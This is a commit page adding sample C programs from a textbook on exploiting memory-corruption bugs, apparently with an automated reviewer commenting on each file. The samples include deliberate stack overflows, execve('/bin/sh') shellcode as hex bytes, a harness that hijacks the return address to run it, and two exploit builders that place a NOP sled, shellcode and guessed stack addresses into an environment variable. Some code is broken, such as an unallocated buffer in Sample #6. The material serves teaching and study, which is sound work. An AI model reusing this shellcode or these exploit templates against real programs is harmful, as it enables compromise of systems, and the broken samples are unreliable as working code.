
Commit 9da300b

author
Elia Pinto
committed
1 parent 5cda410 commit 9da300b


99 files changed

+8294
-0
lines changed

Lines changed: 21 additions & 0 deletions
@@ -0,0 +1,21 @@
1+
/*
2+
3+
The Shellcoder's Handbook: Discovering and Exploiting Security Holes
4+
Jack Koziol, David Litchfield, Dave Aitel, Chris Anley,
5+
Sinan Eren, Neel Mehta, Riley Hassell
6+
Publisher: John Wiley & Sons
7+
ISBN: 0764544683
8+
9+
Chapter 2: Stack Overflows
10+
Sample Program #1
11+
12+
Please send comments/feedback to [email protected] or visit http://www.infosecinstitute.com
13+
14+
*/
15+
16+
int main () {
17+
18+
int array[5] = {1, 2, 3, 4, 5};
19+
20+
printf(“%d\n”, array[5];
21+
}
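Review bot: The `printf` line in `main` does not compile: it uses typographic quotes (`“%d\n”`), is missing its closing parenthesis, and the file never includes `<stdio.h>`. It should read `printf("%d\n", array[5]);` with `#include <stdio.h>` at the top. The read of `array[5]` is one element past the end of the array, which looks like the point of the sample given the chapter title. A comment such as `/* deliberate out-of-bounds read: valid indices are 0..4 */` would stop it being mistaken for a typo. The missing `<stdio.h>` include also applies to Chapter 2 samples #3, #4, #6 and #7, which call `printf` as well.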
Lines changed: 25 additions & 0 deletions
@@ -0,0 +1,25 @@
1+
/*
2+
3+
The Shellcoder's Handbook: Discovering and Exploiting Security Holes
4+
Jack Koziol, David Litchfield, Dave Aitel, Chris Anley,
5+
Sinan Eren, Neel Mehta, Riley Hassell
6+
Publisher: John Wiley & Sons
7+
ISBN: 0764544683
8+
9+
Chapter 2: Stack Overflows
10+
Sample Program #2
11+
12+
Please send comments/feedback to [email protected] or visit http://www.infosecinstitute.com
13+
14+
*/
15+
16+
int main () {
17+
18+
int array[5];
19+
int i;
20+
21+
for (i = 0; i <= 255; ++i){
22+
array[i] = 10;
23+
}
24+
}
25+
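Review bot: The loop in `main` stores to `array[0]` through `array[255]` although `array` has five elements, and nothing in the file says this is intentional. Given the chapter title it is presumably a deliberate demonstration, so a comment on the loop such as `/* deliberate: writes 251 ints past the end of array to corrupt the stack frame; expected to crash */` would make that explicit. That helps readers and anyone triaging static-analysis or sanitizer findings on this directory. `main` also ends without a `return`; adding `return 0;` would match Sample Program #4.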
Lines changed: 27 additions & 0 deletions
@@ -0,0 +1,27 @@
1+
/*
2+
3+
The Shellcoder's Handbook: Discovering and Exploiting Security Holes
4+
Jack Koziol, David Litchfield, Dave Aitel, Chris Anley,
5+
Sinan Eren, Neel Mehta, Riley Hassell
6+
Publisher: John Wiley & Sons
7+
ISBN: 0764544683
8+
9+
Chapter 2: Stack Overflows
10+
Sample Program #3
11+
12+
Please send comments/feedback to [email protected] or visit http://www.infosecinstitute.com
13+
14+
*/
15+
16+
void function(int a, int b){
17+
int array[5];
18+
}
19+
20+
main()
21+
{
22+
function(1,2);
23+
24+
printf("This is where the return address points”);
25+
}
26+
27+
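Review bot: The string literal in `printf("This is where the return address points”);` is closed with a typographic quote (`”`), so the literal is unterminated and the file does not compile; the closing character should be a plain `"`. `main()` is declared without a return type, which C99 and later reject; `int main(void)` with a final `return 0;` is the portable form. `function` declares `array` and never uses it, which is presumably only there to illustrate the frame layout; a one-line comment saying so would prevent it being removed as dead code.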
Lines changed: 33 additions & 0 deletions
@@ -0,0 +1,33 @@
1+
/*
2+
3+
The Shellcoder's Handbook: Discovering and Exploiting Security Holes
4+
Jack Koziol, David Litchfield, Dave Aitel, Chris Anley,
5+
Sinan Eren, Neel Mehta, Riley Hassell
6+
Publisher: John Wiley & Sons
7+
ISBN: 0764544683
8+
9+
Chapter 2: Stack Overflows
10+
Sample Program #4
11+
12+
Please send comments/feedback to [email protected] or visit http://www.infosecinstitute.com
13+
14+
*/
15+
16+
void return_input (void){
17+
char array[30];
18+
19+
gets (array);
20+
printf("%s\n", array);
21+
22+
}
23+
24+
25+
main() {
26+
return_input();
27+
28+
return 0;
29+
30+
}
31+
32+
33+
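Review bot: `return_input` fills the 30-byte `array` with `gets`, which cannot bound the read and was removed from the language in C11, so current toolchains warn about or reject the call as written. If the unbounded read is the behaviour being demonstrated, say so directly above the call, e.g. `/* deliberately unsafe: gets() has no length limit; real code uses fgets(array, sizeof array, stdin) */`. That way the sample cannot be copied as a working input routine. `main()` also has no return type; `int main(void)` is the form C99 and later accept.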
Lines changed: 32 additions & 0 deletions
@@ -0,0 +1,32 @@
1+
/*
2+
3+
The Shellcoder's Handbook: Discovering and Exploiting Security Holes
4+
Jack Koziol, David Litchfield, Dave Aitel, Chris Anley,
5+
Sinan Eren, Neel Mehta, Riley Hassell
6+
Publisher: John Wiley & Sons
7+
ISBN: 0764544683
8+
9+
Chapter 2: Stack Overflows
10+
Sample Program #5
11+
12+
Please send comments/feedback to [email protected] or visit http://www.infosecinstitute.com
13+
14+
*/
15+
16+
char shellcode[] =
17+
"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
18+
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
19+
"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
20+
21+
22+
int main()
23+
{
24+
25+
int *ret;
26+
ret = (int *)&ret + 2;
27+
(*ret) = (int)shellcode;
28+
}
29+
30+
31+
32+
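Review bot: Nothing in `main` explains `ret = (int *)&ret + 2; (*ret) = (int)shellcode;`, which is undefined behaviour in C and only has the intended effect under one specific 32-bit x86 stack-frame layout. The cast `(int)shellcode` truncates the pointer on LP64 targets, and where data pages are mapped non-executable the process faults rather than running the bytes. The `shellcode` array is also undocumented, though its last seven bytes are the ASCII string `/bin/sh`. A header comment stating what the bytes do and which platform the harness assumes would let a reader or a scanner triage this file without disassembling it. The same harness is repeated unchanged in Chapter 3 samples #1, #2 and #3 later in this commit, and the same comment applies there.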
Lines changed: 64 additions & 0 deletions
@@ -0,0 +1,64 @@
1+
/*
2+
3+
The Shellcoder's Handbook: Discovering and Exploiting Security Holes
4+
Jack Koziol, David Litchfield, Dave Aitel, Chris Anley,
5+
Sinan Eren, Neel Mehta, Riley Hassell
6+
Publisher: John Wiley & Sons
7+
ISBN: 0764544683
8+
9+
Chapter 2: Stack Overflows
10+
Sample Program #6
11+
12+
Please send comments/feedback to [email protected] or visit http://www.infosecinstitute.com
13+
14+
*/
15+
16+
#include <stdlib.h>
17+
18+
#define offset_size 0
19+
#define buffer_size 512
20+
21+
char sc[] =
22+
"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
23+
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
24+
"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
25+
26+
27+
unsigned long find_start(void) {
28+
__asm__("movl %esp,%eax");
29+
}
30+
31+
int main(int argc, char *argv[])
32+
{
33+
char *buff, *ptr;
34+
long *addr_ptr, addr;
35+
int offset=offset_size, bsize=buffer_size;
36+
int i;
37+
38+
if (argc > 1) bsize = atoi(argv[1]);
39+
if (argc > 2) offset = atoi(argv[2]);
40+
41+
addr = find_start() - offset;
42+
printf("Attempting address: 0x%x\n", addr);
43+
44+
ptr = buff;
45+
addr_ptr = (long *) ptr;
46+
for (i = 0; i < bsize; i+=4)
47+
*(addr_ptr++) = addr;
48+
49+
ptr += 4;
50+
51+
for (i = 0; i < strlen(sc); i++)
52+
*(ptr++) = sc[i];
53+
54+
buff[bsize - 1] = '\0';
55+
56+
memcpy(buff,"BUF=",4);
57+
putenv(buff);
58+
system("/bin/bash");
59+
}
60+
61+
62+
63+
64+
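Review bot: `main` writes through `buff` without ever assigning it: `ptr = buff;` copies an uninitialized pointer, so every store that follows is undefined behaviour. Sample Program #7 in this same commit performs the allocation and NULL check before the identical code (`if (!(buff = malloc(bsize))) { ... }`); that step is missing here. `find_start` ends without a `return` statement and relies on the inline asm leaving a value in `%eax`, which is also undefined behaviour and holds for `get_sp` in Sample Program #7 too. `printf("Attempting address: 0x%x\n", addr)` passes a `long` to `%x` and should use `%lx`. `<stdio.h>` and `<string.h>` are not included although `printf`, `strlen` and `memcpy` are called.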
Lines changed: 70 additions & 0 deletions
@@ -0,0 +1,70 @@
1+
/*
2+
3+
The Shellcoder's Handbook: Discovering and Exploiting Security Holes
4+
Jack Koziol, David Litchfield, Dave Aitel, Chris Anley,
5+
Sinan Eren, Neel Mehta, Riley Hassell
6+
Publisher: John Wiley & Sons
7+
ISBN: 0764544683
8+
9+
Chapter 2: Stack Overflows
10+
Sample Program #7
11+
12+
Please send comments/feedback to [email protected] or visit http://www.infosecinstitute.com
13+
14+
*/
15+
16+
#include <stdlib.h>
17+
18+
#define DEFAULT_OFFSET 0
19+
#define DEFAULT_BUFFER_SIZE 512
20+
#define NOP 0x90
21+
22+
char shellcode[] =
23+
24+
"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
25+
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
26+
"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
27+
28+
29+
unsigned long get_sp(void) {
30+
__asm__("movl %esp,%eax");
31+
}
32+
33+
void main(int argc, char *argv[])
34+
{
35+
char *buff, *ptr;
36+
long *addr_ptr, addr;
37+
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
38+
int i;
39+
40+
if (argc > 1) bsize = atoi(argv[1]);
41+
if (argc > 2) offset = atoi(argv[2]);
42+
43+
if (!(buff = malloc(bsize))) {
44+
printf("Can't allocate memory.\n");
45+
exit(0);
46+
}
47+
48+
addr = get_sp() - offset;
49+
printf("Using address: 0x%x\n", addr);
50+
51+
ptr = buff;
52+
addr_ptr = (long *) ptr;
53+
for (i = 0; i < bsize; i+=4)
54+
*(addr_ptr++) = addr;
55+
56+
for (i = 0; i < bsize/2; i++)
57+
buff[i] = NOP;
58+
59+
ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
60+
for (i = 0; i < strlen(shellcode); i++)
61+
*(ptr++) = shellcode[i];
62+
63+
buff[bsize - 1] = '\0';
64+
65+
memcpy(buff,"BUF=",4);
66+
putenv(buff);
67+
system("/bin/bash");
68+
}
69+
70+
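Review bot: `bsize` comes straight from `atoi(argv[1])` and is passed to `malloc` and the fill loops with no range check. A value smaller than `strlen(shellcode)`, or one that is not a multiple of `sizeof(long)`, causes writes outside the allocation from the loops, the `buff[bsize - 1]` store and the 4-byte `memcpy`. The `i+=4` step with a `long *` destination also assumes `long` is 4 bytes; on LP64 each iteration stores 8 bytes, so the first loop overruns the block even with the default size. Stepping by `sizeof(long)` and rejecting out-of-range sizes before `malloc` would keep the program's own memory accesses in bounds. `void main` should be `int main`, and `exit(0)` on allocation failure reports success to the caller; `exit(1)` is the conventional status.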
Lines changed: 26 additions & 0 deletions
@@ -0,0 +1,26 @@
1+
/*
2+
3+
The Shellcoder's Handbook: Discovering and Exploiting Security Holes
4+
Jack Koziol, David Litchfield, Dave Aitel, Chris Anley,
5+
Sinan Eren, Neel Mehta, Riley Hassell
6+
Publisher: John Wiley & Sons
7+
ISBN: 0764544683
8+
9+
Chapter 3: Shellcode
10+
Sample Program #1
11+
12+
Please send comments/feedback to [email protected] or visit http://www.infosecinstitute.com
13+
14+
*/
15+
16+
char shellcode[] = "\xbb\x00\x00\x00\x00"
17+
"\xb8\x01\x00\x00\x00"
18+
"\xcd\x80";
19+
20+
int main()
21+
{
22+
int *ret;
23+
ret = (int *)&ret + 2;
24+
(*ret) = (int)shellcode;
25+
}
26+
Lines changed: 28 additions & 0 deletions
@@ -0,0 +1,28 @@
1+
/*
2+
3+
The Shellcoder's Handbook: Discovering and Exploiting Security Holes
4+
Jack Koziol, David Litchfield, Dave Aitel, Chris Anley,
5+
Sinan Eren, Neel Mehta, Riley Hassell
6+
Publisher: John Wiley & Sons
7+
ISBN: 0764544683
8+
9+
Chapter 3: Shellcode
10+
Sample Program #2
11+
12+
Please send comments/feedback to [email protected] or visit http://www.infosecinstitute.com
13+
14+
*/
15+
16+
char shellcode[] = "\xbb\x00\x00\x00\x00"
17+
"\xb8\xfc\x00\x00\x00"
18+
"\xcd\x80";
19+
20+
int main()
21+
{
22+
23+
int *ret;
24+
ret = (int *)&ret + 2;
25+
(*ret) = (int)shellcode;
26+
}
27+
28+
Lines changed: 31 additions & 0 deletions
@@ -0,0 +1,31 @@
1+
/*
2+
3+
The Shellcoder's Handbook: Discovering and Exploiting Security Holes
4+
Jack Koziol, David Litchfield, Dave Aitel, Chris Anley,
5+
Sinan Eren, Neel Mehta, Riley Hassell
6+
Publisher: John Wiley & Sons
7+
ISBN: 0764544683
8+
9+
Chapter 3: Shellcode
10+
Sample Program #3
11+
12+
Please send comments/feedback to [email protected] or visit http://www.infosecinstitute.com
13+
14+
*/
15+
16+
char shellcode[] =
17+
"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
18+
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
19+
"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4a\x41\x41\x41\x41"
20+
"\x4b\x4b\x4b\x4b";
21+
22+
int main()
23+
{
24+
25+
int *ret;
26+
ret = (int *)&ret + 2;
27+
(*ret) = (int)shellcode;
28+
}
29+
30+
31+
